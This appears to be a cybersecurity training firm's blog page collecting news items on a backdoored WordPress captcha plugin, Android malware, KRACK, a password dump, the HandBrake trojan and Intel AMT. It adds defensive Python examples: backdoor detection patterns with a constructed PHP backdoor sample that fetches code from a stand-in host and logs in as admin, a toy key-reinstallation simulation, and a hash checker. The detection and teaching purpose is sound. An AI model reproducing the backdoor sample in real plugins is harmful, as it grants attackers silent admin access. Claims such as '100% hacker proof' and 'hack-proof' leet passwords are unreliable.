WordPress captcha plugin having a hidden backdoor affects over 300,000 websites

WordPress captcha plugin having a hidden backdoor affects over 300,000 websites. Acquiring popular plugins with an enormous user base and using them for low-effort malicious campaigns has become a new trend for bad actors.

Recently the well-known developer BestWebSoft sold its popular WordPress Captcha plugin to an anonymous buyer, who then modified the plugin to download and install a hidden backdoor.

In a recent blog post, the security firm WordFence showed why WordPress recently removed a popular Captcha plugin with more than 300,000 active installations from its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

The plugin was configured to automatically pull an updated “backdoored” version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository without site admin consent.

In the WordPress Captcha plugin, this backdoor code was designed to create a login session for the attacker, in this case the plugin author, with administrative privileges, allowing them to remotely gain access to any of the 300,000 websites using the plugin without requiring any authentication.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself,” reads the WordFence blog post. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Also, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, therefore “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was never there and helping the attacker avoid detection.
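The behaviour WordFence describes (an unauthenticated path that logs in user ID 1, sets auth cookies, fetches code from a non-wordpress.org host and unlinks itself) can be turned into source-level indicators for a quick plugin-directory triage. This scanner is an added example, not WordFence's tooling or the plugin's code; the PHP samples it scans are constructed, and the function names in them are made up.

```python
import os
import re
from typing import Dict, List

# Source-level indicators derived from the behaviour WordFence described:
# an unauthenticated path that logs in user ID 1, sets auth cookies, pulls
# code from a non-wordpress.org host, and then unlinks itself.
INDICATORS = {
    "admin_session": re.compile(r"wp_set_current_user\s*\(\s*1\s*[,)]"),
    "auth_cookie":   re.compile(r"wp_set_auth_cookie\s*\(\s*1\s*[,)]"),
    "remote_fetch":  re.compile(
        r"(?:wp_remote_get|file_get_contents|curl_init)\s*\(\s*['\"]"
        r"https?://(?!(?:[\w.-]+\.)?wordpress\.org/)[^'\"]+"),
    "self_delete":   re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
}

def scan_source(php: str) -> Dict[str, List[int]]:
    """Map each indicator to the 1-based line numbers where it appears."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(php.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def classify(hits: Dict[str, List[int]]) -> str:
    """Logging in as user 1 AND setting its auth cookie is the backdoor
    signature; a lone remote fetch or unlink only warrants a manual look."""
    if "admin_session" in hits and "auth_cookie" in hits:
        return "backdoor-like"
    if hits:
        return "review"
    return "clean"

def scan_plugin_dir(root: str) -> Dict[str, str]:
    """Walk a wp-content/plugins tree and classify every .php file."""
    verdicts: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    verdicts[path] = classify(scan_source(fh.read()))
    return verdicts

# Constructed sample files (not the real plugin code) to exercise the scanner.
SUSPICIOUS_PHP = """<?php
function plugin_auto_update_init() {
    $resp = wp_remote_get('https://update-host.invalid/captcha/update.php');
    file_put_contents(__DIR__ . '/inc/update.php', $resp['body']);
}
function plugin_auto_update_login() {
    wp_set_current_user(1);
    wp_set_auth_cookie(1, true);
    unlink(__FILE__);
}
"""
BENIGN_PHP = """<?php
$info = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/captcha.json');
$user = wp_get_current_user();
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PHP), ("benign", BENIGN_PHP)):
        found = scan_source(src)
        print(label, classify(found), found)
```

Run `scan_plugin_dir("/path/to/wp-content/plugins")` on a real install; a "backdoor-like" verdict for a file that is not part of the plugin's repository copy is what the text describes.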

The reason for adding the backdoor is unclear at this moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind it.

In similar cases, we have seen how organized cyber gangs acquire popular plugins and applications to stealthily infect their large user base with malware, adware, and spyware.

While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”

Using reverse whois lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death to Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

Most Popular Training Courses at Indian Cyber Security Solutions

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Tester Training

Ethical Hacking  training

Python Programming training

 RHCE  training

CEH V9  training

Diploma in Network Security Training

Secured Coding in Java

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

Digital marketing

CCNA training

A new android malware can be a possible threat to your phone.

A new Android malware has been discovered by a group of researchers, which can possibly physically damage your phone.


Your phone is physically under threat due to this new Android Malware.

Hackers, as well as legitimate website administrators, are increasingly using JavaScript-based cryptocurrency miners that consume the CPU power of visitors' PCs to mine Bitcoin or other cryptocurrencies, driven by the recent surge in cryptocurrency prices.

Just last week, researchers from AdGuard revealed that some popular video streaming and ripping sites, including openload, Streamango, Rapidvideo, and OnlineVideoConverter, hijack CPU cycles from their hundreds of millions of visitors to mine the Monero cryptocurrency.

Now, researchers from the Moscow-based cyber security firm Kaspersky Lab have disclosed a new Android malware lurking in fake anti-virus and porn applications, which is capable of a wide range of malicious activities, from mining cryptocurrencies to launching Distributed Denial of Service (DDoS) attacks.

Described as a “jack-of-all-trades” by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.

Loapi Destroyed An Android Phone In Just 2 Days 


When the researchers analyzed the new Android Trojan, dubbed Loapi, they found it can run so many malicious activities at once that it strains a handset to the point where, within just two days of infection, the phone's battery bulged out of its cover.

According to the researchers, the hackers behind Loapi are the same group responsible for the 2015 Android malware Podec. They are distributing the malware through third-party app stores and online advertisements that pose as apps for “popular antivirus solutions and even a famous porn site.”

A screenshot in the Kaspersky blog suggests that Loapi impersonates at least 20 variations of adult-content apps and legitimate antivirus software from AVG, Psafe DFNDR, Kaspersky Lab, Norton, Avira, Dr. Web and CM Security, among others.

Upon installation, Loapi forces the user to grant it ‘device administrator’ permissions by looping a pop-up until a victim clicks yes, which gives the malicious app the same power over your smartphone that you have.

This highest level of privilege on a device would also make Loapi ideal for spying on users; although this capability is not yet present in the malware, the Kaspersky researchers think it could be added in the future.


SSL Certificate


The trustworthiness of SSL certificates is being questioned because of the rise in theft of personal data, even from websites that have an SSL certificate. Wondering how it is done? Here we explain it in a very simplified manner.


Do you know how online passwords are hacked? Well, read on to learn.

In order to understand how the hacking of online passwords works, we first need to understand how safe an SSL certificate really is. These days fund transfers and online shopping are done predominantly through internet banking and credit cards. People believe that once a website acquires an SSL certificate it is entirely safe, but it is always better to secure your own computer and internet connection instead of depending entirely on the payment site, because it is actually quite easy to break the SSL connection. For this we also need to understand how credit cards work and how transactions are performed.

It also helps to understand how attackers abuse weaknesses in credit or debit card transactions to steal passwords: usually card details are stolen using packet sniffing and session hijacking. It is virtually impossible to see the actual data transferred during a transaction, but with session hijacking and packet sniffing an attacker can at least see the data in its encrypted form.

What really is attacked?

A lethal flaw that allows sensitive information to be stolen occurs when an end user is not properly educated about the well-known and easily executed SSL exploit: the SSL man-in-the-middle (MITM) attack. Hackers take advantage of that to get access to your sensitive data. The only thing required to close this gap is a properly educated end user, which is what makes sure your system is 100% hacker proof.

How the hack works and how to do it:

Before we get started on this topic, it is very important to note that hacking credit and debit card details is unlawful and results in serious consequences, including imprisonment. This information is provided only to make you aware of how it works.

The following diagram gives a very simplified picture of how your SSL website session works during an attack:

[Figure: MITM attack diagram]

A certificate is used to establish the secure SSL connection. Ideally you receive the right certificate and are connecting directly to the website you intended to use. Then all your data is encrypted from your browser to the SSL website, where the bank's server uses the key pair behind the certificate it presented to you to decrypt your data/credentials. If that is truly the case, it is very hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your traffic.


Security Flaw in WPA2

 


A security flaw in WPA2, the security protocol used by most modern WiFi systems, could make it easy for attackers to steal all sorts of sensitive data such as credit card numbers, passwords and emails, say researchers at the Belgian university KU Leuven.


WiFi systems could be widely affected by the WPA2 flaw.

In fact, depending on the network configuration, the flaw could also permit an attacker to inject or manipulate data in the connection, for example injecting ransomware or other malware into websites the victim is visiting, purely because of this security flaw.


Widespread Impact

According to the researchers, a series of vulnerabilities was found in Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys and other systems. Users will have to update affected products as soon as patches become available to fix the issue.

The research has been presented at the ACM Conference on Computer and Communications Security, which took place from October 30 to November 3 in Dallas, and will also be presented at the Black Hat Europe conference in December.

According to the researchers, it was wise to hold back disclosure of the flaw in order to give other vendors more time to develop and release updates.

As a proof of concept, the DistriNet researchers implemented a key reinstallation attack (KRACK) against an Android smartphone, noting that Linux and Android 6.0 or higher were particularly vulnerable: both operating systems can be tricked into reinstalling an all-zero encryption key.

The main attack is against the four-way handshake of the WPA2 protocol, according to the researchers. The handshake takes place when a client wishes to join a protected WiFi network, and it is used to confirm that the client and access point hold the correct credentials.
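Why reinstalling a key is dangerous, as an added illustration that is not part of the KU Leuven research or the original post: installing a key resets the per-packet nonce, so a replayed handshake message makes the client reuse a (key, nonce) pair, and under a stream-style cipher that cancels the keystream. The cipher below is a constructed SHA-256 keystream standing in for CCMP, the key bytes are made up, and the all-zero key case models the Linux/Android 6.0+ behaviour described above.

```python
import hashlib

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def keystream(key: bytes, nonce: int, length: int) -> bytes:
    """Toy stream cipher standing in for CCMP: keystream block i is
    SHA-256(key || nonce || i). The property that matters is the real one:
    the same (key, nonce) pair always yields the same keystream."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce.to_bytes(6, "big")
                              + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]

class Station:
    """Client side of the handshake: holds the installed key and the
    per-packet nonce (the 802.11 packet number)."""
    def __init__(self, key: bytes):
        self.install_key(key)

    def install_key(self, key: bytes) -> None:
        # Installing a key resets the packet number to its initial value.
        # A replayed message 3 of the handshake re-triggers this with the
        # same key, which is exactly the key reinstallation condition.
        self.key = key
        self.nonce = 1

    def send(self, plaintext: bytes):
        ct = xor(plaintext, keystream(self.key, self.nonce, len(plaintext)))
        used = self.nonce
        self.nonce += 1
        return used, ct

def xor_of_plaintexts(ct1: bytes, ct2: bytes) -> bytes:
    """Two frames under one (key, nonce): the keystreams cancel, leaving
    p1 XOR p2, which is what an eavesdropper learns without any key."""
    return xor(ct1, ct2)

def decrypt_under_zero_key(nonce: int, ct: bytes) -> bytes:
    """Linux/Android 6.0+ case from the text: the reinstalled key is all
    zeros, so the keystream can be regenerated with no secret at all."""
    return xor(ct, keystream(bytes(32), nonce, len(ct)))

def demo() -> dict:
    key = b"constructed-pairwise-key"
    sta = Station(key)
    p1, p2 = b"GET /account HTTP/1.1", b"POST /payment HTTP/1.1"
    n1, c1 = sta.send(p1)
    sta.install_key(key)          # replayed handshake: same key, nonce reset
    n2, c2 = sta.send(p2)
    sta.install_key(bytes(32))    # the all-zero key variant
    n3, c3 = sta.send(b"Cookie: session=abc123")
    return {
        "nonce_reused": n1 == n2,
        "leaked_xor_correct": xor_of_plaintexts(c1, c2) == xor(p1, p2),
        "zero_key_plaintext": decrypt_under_zero_key(n3, c3),
    }

if __name__ == "__main__":
    print(demo())
```

A patched client refuses to reinstall an already-installed key, so the nonce keeps increasing and neither leak occurs; that is why the vendor updates mentioned above matter.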


Breach of personal data


Breaches of personal data by online hackers have greatly endangered users' online lives. Hackers usually go for the weakest link first to gain access to your online accounts.


Over 1.4 billion leaked plain-text passwords circulating online

Reusing the same password across multiple services gives hackers the opportunity to break into a user's other online accounts using credentials gathered from a breach of personal data.

Researchers from the security firm 4iQ have now discovered a new aggregated database on the dark web (also released via torrent) that contains a massive 1.4 billion usernames and passwords in clear text.

We downloaded a copy to verify its authenticity a few days ago, from a post on Reddit that gained more publicity, even though links to download the collection had already been circulating on dark-web sites for the last few weeks.

The gigantic 41GB collection, as shown below, contains 1.4 billion username, email and password combinations, neatly fragmented and organized into two- and three-level directories, the researchers said.

The combined database contains plain-text credentials leaked from Pastebin, Bitcoin, MySpace, LinkedIn, YouPorn, Netflix, Zoosk, Last.FM, RedBox, Badoo, games like Runescape and Minecraft, as well as credential lists like Exploit.in and Anti Public.

Password selection policies

 

Password selection policies are important to follow when choosing passwords for your various online websites. The basic rule is to mix and match characters and create a unique, precise password that you can still remember.

The database has been neatly structured and indexed alphabetically, so that even hackers with basic knowledge can quickly search for passwords.

While some of the breaches are somewhat old, with the stolen credentials circulating online for some time, the success rate for criminals is still high, due to users' poor habit of reusing passwords across different platforms and choosing easy-to-guess passwords.

It is still uncertain who is responsible for uploading the database to the dark web, but whoever it is has included Dogecoin and Bitcoin wallet addresses for anyone who wishes to donate.

In order to safeguard yourself, it is highly advised to stop using the same password across multiple websites and to use complex, strong passwords. Also follow the password selection policies above to create hack-proof passwords.

For example, you can use “leet” substitution to build a unique password: convert “Sneha likes swimming” into “$N3#@|!K3$$WMM!N&” (shown just as an example). You can create various shorter passwords using the same method, or find resources online to help you encode the password you have chosen.


Mac App developers Issued Urgent Malware Warning


Mac app developers issued an urgent malware warning. Mac security has been going through a difficult time since Check Point warned users about a first-of-its-kind Trojan spreading in Europe. The latest malicious problem has been found in one of the most popular video transcoding apps for Mac.

The developers of HandBrake issued a warning that one of the mirror sites for downloading the software had been compromised. The warning applies to users who downloaded the software between 2 and 6 May, who have the highest chance of being infected.

On the mirror server download.handbrake.fr, the installer file (HandBrake-1.0.7.dmg) was replaced by a malicious file that gives the attacker root privileges on the system. The malware is a variant of OSX.PROTON. In February, Apple had issued an update to XProtect to cover the original Proton; the latest version should download automatically for most users.

The process for detecting and removing the malware is as follows:

Detection:

Your device is infected if you see a process called “Activity_agent” in the macOS Activity Monitor application. Likewise, if you have installed a HandBrake.dmg with the following checksums, you are infected:

SHA1: 0935a43ca90c6c419a49e4f8f1d75e68cd70b274

SHA256: 013623e5e50449bbdf6943549d8224a122aa6c42bd3300a1bd2b743b01ae6793

The Trojan in question is a new variant of OSX.PROTON.

Removal:

Open up the “Terminal” application and run the following commands:

launchctl unload ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist

rm -rf ~/Library/RenderFiles/activity_agent.app

If ~/Library/VideoFrameworks/ contains proton.zip, remove the folder.

Then remove any “HandBrake.app” installs you may have.

HandBrake users should remain careful, although the primary download site and the automatic updater in versions 1.0 and later were not affected. As a safety measure, users are advised to change all passwords stored in any macOS or browser keychains.
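The detection steps above can be scripted: hash a downloaded installer against the two published checksums and look for the persistence paths named in the removal instructions. This is an added example, not HandBrake's own tooling; it only reports, leaving removal to the commands above, and the “Activity_agent” process check stays with Activity Monitor as the text describes.

```python
import hashlib
import os
from typing import Dict, List, Optional

# Checksums of the trojanised HandBrake-1.0.7.dmg, as published in the
# HandBrake advisory quoted above.
KNOWN_BAD = {
    "sha1":   "0935a43ca90c6c419a49e4f8f1d75e68cd70b274",
    "sha256": "013623e5e50449bbdf6943549d8224a122aa6c42bd3300a1bd2b743b01ae6793",
}

# Persistence paths from the removal instructions, relative to the home dir.
LAUNCH_AGENT = "Library/LaunchAgents/fr.handbrake.activity_agent.plist"
AGENT_APP    = "Library/RenderFiles/activity_agent.app"
PROTON_ZIP   = "Library/VideoFrameworks/proton.zip"

def digests(data: bytes) -> Dict[str, str]:
    """SHA-1 and SHA-256 of an in-memory blob (handy for small test inputs)."""
    return {"sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}

def digests_of_file(path: str) -> Dict[str, str]:
    """Stream a large .dmg through both hashes without loading it whole."""
    h1, h256 = hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h1.update(chunk)
            h256.update(chunk)
    return {"sha1": h1.hexdigest(), "sha256": h256.hexdigest()}

def is_known_bad(d: Dict[str, str]) -> bool:
    """True if either digest matches the published malicious installer."""
    return any(d.get(k, "").lower() == v for k, v in KNOWN_BAD.items())

def persistence_artifacts(home: str) -> List[str]:
    """Return the Proton persistence paths that exist under a home directory."""
    return [p for p in (LAUNCH_AGENT, AGENT_APP, PROTON_ZIP)
            if os.path.exists(os.path.join(home, p))]

def assess(dmg_path: Optional[str] = None, home: Optional[str] = None) -> dict:
    """Combine the installer hash check with the on-disk artifact check."""
    home = home or os.path.expanduser("~")
    findings = {
        "installer_matches_known_bad": False,
        "artifacts": persistence_artifacts(home),
    }
    if dmg_path and os.path.isfile(dmg_path):
        findings["installer_matches_known_bad"] = is_known_bad(digests_of_file(dmg_path))
    findings["infected"] = (findings["installer_matches_known_bad"]
                            or bool(findings["artifacts"]))
    return findings

if __name__ == "__main__":
    import sys
    print(assess(sys.argv[1] if len(sys.argv) > 1 else None))
```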


Employee paid $300,000 for hacking employer


An employee was ordered to pay $300,000 for hacking his employer. A former private security officer at the firm Security Specialists has been told to pay nearly $319,000 in damages for hacking his employer's payroll records to inflate the number of hours he had worked.

The culprit, Yovan Garcia, later also stole data from the firm's server and defaced its website.

District Judge Michael Fitzgerald of California said that the culprit had used the data stolen from the firm's server to benefit a competing business.

The company first noticed the problem with Garcia's pay records in July 2014, two years after he joined the company. In one case, the records showed he had worked 12 hours per day over a two-week period and was owed 40 hours of overtime pay, when in fact he had only worked eight hours per day.

According to the judge of the Central District Court, he had obtained login credentials and accessed the records without authorisation.

Judge Fitzgerald said: “As a result, defendant Garcia was paid thousands of dollars more in overtime wages than he was really owed.”

The judge ordered him to pay $318,661.70 to Security Specialists to cover its lost income and lost data.


Intel fixed nine-year-old flaw


Intel fixed a nine-year-old flaw. Yes, after nine years a flaw was detected and patched by Intel. Intel, one of the world's largest semiconductor chip makers, has come under fire after it emerged that the company had sold workstation and server chips with a vulnerability that could give a remote attacker complete control over the machine.

The bug affects Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT) firmware versions 6.x to 11.6. If exploited, it could give an attacker near-unfettered access to the targeted machine.

AMT is a tool that allows an authorized user to remotely manage a machine, giving serial access and, with the right drivers, a remote desktop experience. In most cases AMT requires the user to authenticate with a password, but this vulnerability essentially bypasses that process, handing the keys to the kingdom to anyone with a copy of Metasploit.

If the computer's network is configured incorrectly so that port 16992 is reachable from the outside world, anyone anywhere can take advantage of these features at any time. Even otherwise, someone could easily attack it from within the local network.

The most troubling part of this matter is that the bug, which luckily is not found in consumer Intel chips, remained undetected for almost nine years. Intel has been selling vulnerable silicon for almost a decade, so no one knows exactly how many computers are at risk; there must be, quite literally, hundreds of millions of devices.

Charlie Demerjian wrote on the blog SemiAccurate: “the short version is that every Intel platform with AMT, ISM, and SBT from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole”. He added, “even if your machine doesn't have AMT, ISM, or SBT provisioned, it is still vulnerable, just not over the network.”


App Flaw Reportedly Creates Backdoor Hacking Millions Android Phones


A recent study of an internet communication mechanism common in mobile devices has revealed that so-called ‘open ports’ are much more vulnerable to security breaches than expected.

Open ports are an integral piece of internet infrastructure that allows programs to accept packets of information from remote hosts. These communication mechanisms are routinely used on traditional computers, where they are secure because the computers' Internet Protocol (IP) addresses don't change. An IP address identifies a connected device.


“Hundreds of Android apps on Google Play that help users connect to PCs via Wi-Fi leave some ports open and poorly secured, exposing the device to hackers who can steal private information such as contacts, security credentials and photos; they can remotely control a device, perform a denial of service attack, or inject malicious code that could jumpstart widespread, virus-like attacks”, the researchers say.

The research was done by a group from the University of Michigan, who scanned almost 100,000 popular apps on Google Play. Of these, 1,632 apps created open ports, mostly to connect to PCs; 410 of those had very weak or no security protection, and 57 left ports completely open for attackers to tinker with. They said the most vulnerable of the lot is an app called Wifi File Transfer, which has as many as 10 million Android downloads, lets users share data across devices and connect to their phones from their computers, and has no password or fingerprint authentication to protect the user's data.

The researchers have advised Android users to update AirDroid to the latest patched version and not to use default passcodes. Vulnerable open-port apps should only be launched when needed, and after using them users should make sure to exit them fully through the task manager.

“Android users need to remain extra careful when using apps whose functionality is data sharing across devices, proxy/VPN, or enabling the user to control a phone remotely without physically accessing it. Consider using only those created by developers with good reputations,” said Yunhan Jia, a doctoral student in computer science and engineering who is involved in the research.

The developers fixed the bug as soon as the Michigan researchers notified them; however, the makers of the Wifi File Transfer app have not acknowledged it to date.

The full research paper details half a dozen more apps including PhonePal and Virtual USB that create a backdoor for hackers to exploit.

The researchers say that “the user, and Google for that matter, is quite helpless in this matter, and developers will have to do a lot of work on their end to make their services safer. For now, it's best for users to uninstall all the mentioned apps.”

 


Google Facebook $100 million email scam found


The tech companies Google and Facebook have confirmed that they fell victim to a $100 million email scam. It was reported that a Lithuanian man had been charged over an email phishing attack against “two US-based internet companies.”

Evaldas Rimasauskas, a 48-year-old man, was accused of being behind the scam. From 2013 to 2015, he defrauded the companies into transferring payments to accounts he controlled.

When he was arrested, Google and Facebook were not named as the victims, but on 27 April, according to Fortune, an investigation confirmed that the victims were none other than Google and Facebook.

The US Department of Justice said, “fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multi-million dollar transactions with [the Asian] company.”

The cybercriminal has since been charged by the US Department of Justice with one count of wire fraud, three counts of money laundering and one count of aggravated identity theft. He is also accused of forging invoices, contracts, and letters.

Back in March, acting attorney Joon Kim said “From half a world away, Evaldas Rimasauskas allegedly targeted multinational internet companies and tricked their agents and employees into wiring over $100 million to overseas bank accounts under his control.”

A spokesperson for Google said, “We detected this fraud against our vendor management team and promptly alerted the authorities. We recouped the funds and we're pleased this matter is resolved.”

A spokeswoman for Facebook said: “Facebook recovered the bulk of the funds shortly after the incident and has been cooperating with law enforcement in its investigation.”

Facebook and Google have not disclosed the amount of money they lost in the attack.

 
